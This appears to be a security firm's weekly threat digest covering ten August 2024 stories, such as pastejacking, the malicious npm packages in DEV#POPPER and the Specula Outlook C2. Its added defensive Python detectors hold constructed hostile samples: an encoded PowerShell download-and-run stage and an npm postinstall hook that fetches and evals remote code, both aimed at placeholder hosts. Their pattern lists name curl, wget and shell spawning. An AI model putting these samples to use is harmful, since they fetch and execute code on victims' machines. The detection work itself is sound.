By security practitioners, for security practitioners

Weekly Top 10: 8.05.2024: Cybercriminals Deploy 100K+ Malware Android Apps to Steal OTP Codes; North Korea-Linked Malware Targets Developers on Windows, Linux, and macOS; Proofpoint Settings Exploited, and More.

WEEKLY TOP TEN: August 5, 2024, 16:00 GMT

  1. Fighting Ursa Luring Targets With Car for Sale

    The Russian threat actor tracked as Fighting Ursa (APT28) is running a new campaign to distribute its HeadLace backdoor. The campaign chains several legitimate, widely used hosting services so that the infrastructure looks benign to end users. APT28 has been targeting diplomats and other high-value individuals with this phishing lure, which advertises an expensive vehicle for sale.

    The infection chain starts on Webhook.site, a legitimate service for hosting and inspecting HTTP responses. The hosted page contains malicious HTML that prompts the user to download a ZIP archive carrying the HeadLace backdoor. The files inside the archive are disguised to look benign; when executed, they download and run additional malware.
  2. OneDrive Pastejacking: The Crafty Phishing and Downloader Campaign

    Security researchers at Trellix have identified a new phishing campaign that tricks users into pasting a Base64-encoded PowerShell command into a PowerShell window. It starts with a phishing email carrying an HTML attachment that imitates a OneDrive page. When opened, the page displays a fake error with plausible error details and a link to the official Microsoft error page.

    If the user clicks "how to fix," the page writes the Base64 string to the clipboard (pastejacking) and walks the user through opening PowerShell and running the clipboard contents. Once executed, the command downloads and runs a compiled AutoIt3 (.a3x) script, infecting the user.
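    The command the victim pastes runs through PowerShell's -EncodedCommand switch, so the interesting part of the process-creation event is a Base64 blob that hides the download stage. The following detection logic is an added example, not Trellix's or the page's code: it decodes the blob (UTF-16LE, as -EncodedCommand expects) from constructed Sysmon-style records, looks for download-and-run indicators, and treats explorer.exe (the Run dialog) as an interactive parent. The payload URL, the event format and the indicator list are assumptions for illustration.

```python
import base64
import re

# Constructed Sysmon-style process-creation records (not real telemetry). The first
# mimics the pastejacking victim: explorer.exe (the Win+R dialog) spawns a hidden
# PowerShell with an -EncodedCommand whose Base64 wraps UTF-16LE text, exactly what
# the "how to fix" instructions have the user paste. The URL is a placeholder.
_PAYLOAD = (
    "Invoke-WebRequest 'http://example.invalid/fix.zip' -OutFile $env:TEMP\\fix.zip; "
    "Expand-Archive $env:TEMP\\fix.zip $env:TEMP\\fix; Start-Process $env:TEMP\\fix\\AutoIt3.exe"
)
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    'ParentImage=C:\\Windows\\explorer.exe CommandLine="powershell.exe -w hidden -ep bypass -enc '
    + _ENCODED + '"',
    'ParentImage=C:\\Program Files\\Git\\bin\\bash.exe CommandLine="powershell.exe -NoProfile -File build.ps1"',
]

EVENT_RE = re.compile(r'ParentImage=(?P<parent>.*?) CommandLine="(?P<cmd>.*)"')
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENC_FLAG = re.compile(r"(?<![\w-])-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Cmdlets and names a decoded pastejacking stage typically contains (assumed list).
INDICATORS = re.compile(
    r"(Invoke-WebRequest|\biwr\b|DownloadString|Invoke-Expression|\biex\b|Start-Process|AutoIt3)", re.I
)
# Parents that mean "a human typed this" rather than "a build ran this" (assumption).
INTERACTIVE_PARENTS = {"explorer.exe"}


def decode_encoded_command(cmdline: str):
    """Return the plaintext behind -EncodedCommand, or None if absent or not valid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(event: str) -> dict:
    """Parse one record, decode any encoded command and score it."""
    m = EVENT_RE.match(event)
    if not m:
        raise ValueError("unrecognised record format")
    parent = m.group("parent").rsplit("\\", 1)[-1].lower()
    decoded = decode_encoded_command(m.group("cmd"))
    indicators = sorted({hit.lower() for hit in INDICATORS.findall(decoded or "")})
    suspicious = decoded is not None and (bool(indicators) or parent in INTERACTIVE_PARENTS)
    return {
        "parent": parent,
        "encoded": decoded is not None,
        "decoded": decoded,
        "indicators": indicators,
        "suspicious": suspicious,
    }


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(triage_event(event))
```

    The decode step matters more than the indicator list: once the plaintext is in the alert, an analyst sees the download URL and the dropped filename directly, and the same decoder works on 4688 events or EDR telemetry that carry the full command line.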
  3. Cybercriminals Deploy 100K+ Malware Android Apps to Steal OTP Codes

    A report from Zimperium identifies more than 107,000 Android apps that contain malware built to intercept one-time passcodes (OTPs) delivered by text message. Once installed, a malicious app requests SMS permissions; if the user grants them, the app forwards incoming SMS messages containing OTP codes to the operators.

    Zimperium's researchers assess that the stolen codes were used to sign the victims' phone numbers up for services that require SMS verification. Google states that users are automatically protected against this malware by Google Play Protect; note that Play Protect only covers devices with Google Play Services enabled, so sideloaded installs on devices without it are outside that protection.
  4. North Korea-Linked Malware Targets Developers on Windows, Linux, and macOS

    Threat actors posing as prospective employers are running a new campaign that tricks software developers into installing malware. The campaign, dubbed DEV#POPPER, starts with an online job interview in which the "interviewer" instructs the candidate to download and run malicious npm packages as part of a coding task.

    When the victim installs the npm packages, the system is infected with InvisibleFerret, an infostealer and keylogger.
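    The installation itself is the trigger here: an npm package can run arbitrary commands from its lifecycle hooks (preinstall, install, postinstall, prepare) the moment `npm install` runs, before any of the "task" code is even opened. The audit below is an added example, not Securonix's analysis or any project's tooling: it inspects constructed package.json documents (the package names, commands and URL are invented) and flags lifecycle hooks that fetch remote content, evaluate dynamically built code, decode embedded payloads or spawn a shell.

```python
import json
import re

# Constructed package.json contents (not real packages): a benign library and an
# "interview task" whose postinstall hook fetches and eval()s remote JavaScript.
SAMPLE_PACKAGES = {
    "benign-lib": json.dumps({
        "name": "benign-lib", "version": "1.0.0",
        "scripts": {"test": "mocha", "build": "tsc -p ."},
    }),
    "interview-task": json.dumps({
        "name": "interview-task", "version": "0.0.3",
        "scripts": {
            "postinstall": "node -e \"require('https').get('https://example.invalid/x',"
                           "r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d))})\"",
            "start": "node index.js",
        },
    }),
}

# Hooks npm runs automatically during install (prepublish runs on install for local packages).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# (pattern, reason) pairs; the list is an assumption chosen for this example.
RISKY = [
    (r"\bcurl\b|\bwget\b|\bInvoke-WebRequest\b|\biwr\b|https?://", "fetches remote content"),
    (r"node\s+-e\b|\beval\(|new Function\(", "executes dynamically built code"),
    (r"\bbase64\b|\batob\(|Buffer\.from\([^)]*,\s*['\"]base64", "decodes an embedded payload"),
    (r"\bpowershell\b|\bcmd(\.exe)?\s+/c\b|\bsh\s+-c\b", "spawns a shell"),
]


def audit_package_json(text: str) -> dict:
    """Return every install-time hook with the reasons it looks risky and an overall verdict."""
    pkg = json.loads(text)
    scripts = pkg.get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = [why for pat, why in RISKY if re.search(pat, cmd)]
        findings.append({"hook": hook, "command": cmd, "reasons": reasons})
    risky = sum(len(f["reasons"]) for f in findings)
    # Any lifecycle hook deserves a look (native builds use them legitimately);
    # a hook that matches a risky pattern should stop the install.
    verdict = "block" if risky else ("review" if findings else "ok")
    return {"name": pkg.get("name"), "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    for name, text in SAMPLE_PACKAGES.items():
        print(name, audit_package_json(text))
```

    A static check like this belongs in front of `npm install`, but the cheaper control for anything a stranger hands you is to install with `npm install --ignore-scripts` (or set `ignore-scripts=true` in .npmrc) inside a disposable VM, then read the package before running anything.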
  5. Threat Actor Abuses Cloudflare Tunnels to Deliver RATs

    Researchers at Proofpoint have observed threat actors abusing Cloudflare Tunnels to deliver malware in a phishing campaign. Cloudflare's TryCloudflare feature lets anyone expose a local service through a temporary hostname without creating an account, which gives attackers disposable, trusted-looking infrastructure that is hard to block by domain.

    Proofpoint has observed tens of thousands of phishing emails pointing at these tunnels. Users who fall for the phish are infected with a Remote Access Trojan (RAT), with XWorm being the most prevalent RAT in this campaign.
  6. Proofpoint Settings Exploited to Send Millions of Phishing Emails Daily

    A permissive relay configuration in Proofpoint's email protection service allowed attackers to send millions of spoofed emails. The emails impersonated large companies such as Disney, Nike, and IBM, and because they were relayed by Proofpoint on the impersonated customers' behalf, they carried valid SPF and DKIM results.

    The threat actors started by standing up their own SMTP server to craft the spoofed messages, then relayed them through Proofpoint's servers via compromised Microsoft Office 365 accounts.

    The root cause was a weak trust setting in Proofpoint's handling of relays from Microsoft domains: Proofpoint accepted mail from the outbound IP ranges of any Office 365 tenant, not just the customer's own tenant. Proofpoint has since corrected this so that customers must explicitly identify which Microsoft 365 tenants may relay through their account.
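    To make the flaw concrete, the following is an added example (not Proofpoint's code or its actual configuration) that models the relay decision both ways. The weak rule accepts any message arriving from a Microsoft 365 outbound address. The hardened rule additionally requires the X-OriginatorOrg header, which Exchange Online stamps with the sending tenant's domain, to name a tenant the customer has allow-listed. The IP ranges, tenant names and messages are constructed stand-ins.

```python
import ipaddress
from email import message_from_string
from email.message import Message

# Stand-ins for the published Microsoft 365 outbound ranges (constructed, not the real
# list) and for the tenants this customer actually sends from (hypothetical).
M365_OUTBOUND = [ipaddress.ip_network("203.0.113.0/24")]
ALLOWED_TENANTS = {"contoso.com", "contoso.onmicrosoft.com"}

# Constructed messages. Exchange Online sets X-OriginatorOrg to the sending tenant's
# domain; the spoof carries the attacker's tenant but the customer's From: address.
SAMPLE_LEGIT = (
    "X-OriginatorOrg: contoso.com\r\n"
    "From: billing@contoso.com\r\nTo: customer@example.net\r\nSubject: Invoice\r\n\r\nbody"
)
SAMPLE_SPOOF = (
    "X-OriginatorOrg: attacker.onmicrosoft.com\r\n"
    "From: rewards@contoso.com\r\nTo: victim@example.net\r\nSubject: Your reward\r\n\r\nbody"
)


def from_m365(src_ip: str) -> bool:
    """True if the SMTP session's source address is inside the Microsoft 365 ranges."""
    ip = ipaddress.ip_address(src_ip)
    return any(ip in net for net in M365_OUTBOUND)


def weak_relay_policy(src_ip: str, msg: Message) -> bool:
    """The permissive rule: relay (and DKIM-sign) anything from any Microsoft 365 address."""
    return from_m365(src_ip)


def hardened_relay_policy(src_ip: str, msg: Message) -> bool:
    """Relay only when the M365 source also identifies itself as one of *our* tenants.

    The IP check stays: X-OriginatorOrg is only trustworthy when Exchange Online,
    not the sender, wrote it, and that is only guaranteed for mail from its ranges.
    """
    if not from_m365(src_ip):
        return False
    tenant = (msg.get("X-OriginatorOrg") or "").strip().lower()
    return tenant in ALLOWED_TENANTS


def evaluate(src_ip: str, raw: str) -> dict:
    """Run both policies on one message so the difference is visible side by side."""
    msg = message_from_string(raw)
    return {
        "from": msg["From"],
        "weak": weak_relay_policy(src_ip, msg),
        "hardened": hardened_relay_policy(src_ip, msg),
    }


if __name__ == "__main__":
    print("spoof:", evaluate("203.0.113.77", SAMPLE_SPOOF))
    print("legit:", evaluate("203.0.113.10", SAMPLE_LEGIT))
```

    The spoofed message passes the weak rule because the attacker's tenant shares Microsoft's outbound IP space with every other tenant; only a per-customer tenant identity closes the gap.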
  7. New Specula Tool Uses Outlook for Remote Code Execution (RCE) in Windows

    TrustedSec released a new red team post-exploitation framework called "Specula" on July 29th. Specula turns Microsoft Outlook into a C2 beacon by abusing the custom Outlook Home Page feature: the page is set through a Windows Registry value under the user's Outlook WebView key, and although Microsoft removed the feature from Outlook's user interface, the registry setting still works in current versions. The attacker-hosted home page serves VBScript or JavaScript that Outlook renders and executes. Because the code runs inside Outlook, the parent process of anything it spawns is outlook.exe, which helps it blend in with normal activity.
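    Because the persistence lives in one well-known registry location, it is a good candidate for a simple detection. The following is an added example (not TrustedSec's code or part of Specula) that parses constructed Sysmon Event ID 13 (registry value set) records and flags writes to Outlook's WebView URL values, noting which folder was hijacked, whether the page is remote, and which process wrote the value. The record format, SID and URLs are assumptions for illustration.

```python
import re

# Constructed Sysmon Event ID 13 (RegistryEvent: value set) lines; not real telemetry.
# Sysmon reports HKCU paths under HKU\<SID>. The SID and URLs are placeholders.
SAMPLE_EVENTS = [
    "EventID=13 Image=C:\\Windows\\System32\\reg.exe "
    "TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Office\\16.0\\Outlook\\WebView\\Inbox\\URL "
    "Details=http://203.0.113.5/home.html",
    "EventID=13 Image=C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE "
    "TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Office\\16.0\\Outlook\\Preferences\\ReadingPaneOn "
    "Details=DWORD (0x00000001)",
    "EventID=13 Image=C:\\Users\\a\\AppData\\Local\\Temp\\x.exe "
    "TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Office\\16.0\\Outlook\\WebView\\Calendar\\URL "
    "Details=https://cdn.example.invalid/cal",
]

EVENT_RE = re.compile(
    r"EventID=(?P<id>\d+) Image=(?P<image>.*?) TargetObject=(?P<target>\S+) Details=(?P<details>.*)"
)
# The home-page URL value for any folder (Inbox, Calendar, ...) under any Office version.
WEBVIEW_URL = re.compile(
    r"\\Software\\Microsoft\\Office\\(?P<ver>\d+\.\d+)\\Outlook\\WebView\\(?P<folder>[^\\]+)\\URL$", re.I
)


def detect_outlook_homepage(event: str):
    """Return details of a WebView URL write, or None if the record is not one."""
    m = EVENT_RE.match(event)
    if not m or m.group("id") != "13":
        return None
    hit = WEBVIEW_URL.search(m.group("target"))
    if not hit:
        return None
    url = m.group("details").strip()
    return {
        "folder": hit.group("folder"),
        "office_version": hit.group("ver"),
        "url": url,
        "writer": m.group("image").rsplit("\\", 1)[-1].lower(),
        # A remote page is the Specula pattern; a local file would still merit a look.
        "remote": bool(re.match(r"https?://", url, re.I)),
    }


def triage(events):
    """Keep only the records that set an Outlook home page."""
    return [r for r in (detect_outlook_homepage(e) for e in events) if r]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

    In practice the writer is the most useful field: Outlook itself has no reason to populate these values, so a write from reg.exe, PowerShell or an unknown binary is the alert, and the URL gives the hunting pivot.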
  8. Black Basta Ransomware Switches to More Evasive Custom Malware

    Black Basta is a ransomware gang responsible for over 500 successful attacks. Its recent intrusions use new TTPs, adopted after law enforcement disrupted its former initial-access partner, QBot. The gang has been observed using a new backdoor named SilentNight, delivered through malvertising rather than email, which marks a change in tactics. Analysts have also observed Black Basta deploying customized malware that appears to be developed in-house instead of relying on publicly available tools.
  9. Improving the Security of Chrome Cookies on Windows

    Google has implemented a stronger protection for cookies stored by Chrome on Windows. Chrome has always relied on the operating system to protect the cookie encryption key: Keychain on macOS, a system-provided wallet on Linux, and DPAPI on Windows. DPAPI's protection boundary is the user account, which is much weaker than Keychain's per-application access control.

    Any process running as the logged-in user can call DPAPI to decrypt data that user encrypted, which is exactly how infostealers harvest Chrome cookies. As of Chrome 127, Google has introduced application-bound encryption: the key is wrapped by a privileged Chrome service that verifies the caller is Chrome before unwrapping it, giving Windows protection closer to what Keychain provides on macOS. An attacker who already holds administrator rights can still bypass this, so it raises the cost of cookie theft rather than eliminating it.
  10. Google Chrome Warns uBlock Origin May Soon Be Disabled

    In other Chrome news, Google has begun deprecating Manifest V2 extensions. As of Chrome 127, a warning banner appears next to extensions that have not moved to Manifest V3 (MV3). uBlock Origin's creator, Raymond Hill, has stated that the extension cannot be ported to MV3 because of the restrictions Google enforces there. This is a potential security regression: content-blocking extensions such as uBlock Origin protect users from malicious redirects and malvertising. Google's published timeline gives no exact date for disabling MV2 extensions, but it indicates that the cutoff is near.

Our Threat Operations and Intelligence team compiles a daily digest of the most recent online cybersecurity risks. The following top 10 stories were selected from the 40+ original ones we determined to be most significant during the course of the week, ranking by highest risk and using multiple sources when available:
